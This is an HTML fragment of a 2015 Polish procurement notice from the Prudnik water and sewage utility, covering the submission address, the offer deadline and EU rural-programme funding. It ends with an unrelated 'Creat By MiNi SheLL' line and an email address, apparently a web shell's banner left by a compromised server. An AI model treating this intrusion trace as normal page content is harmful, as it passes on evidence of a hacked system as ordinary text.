<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Wodociągów i Kanalizacji w Prudniku Jednoosobowa Spółka Gminy
Prudnik z o. o. ul. Poniatowskiego 7 - sekretariat, 48 - 200 Prudnik.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.01.2015 godzina 10:00, miejsce: Zakład Wodociągów i Kanalizacji w Prudniku Jednoosobowa Spółka Gminy
Prudnik z o. o. ul. Poniatowskiego 7 - sekretariat, 48 - 200 Prudnik.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na
lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com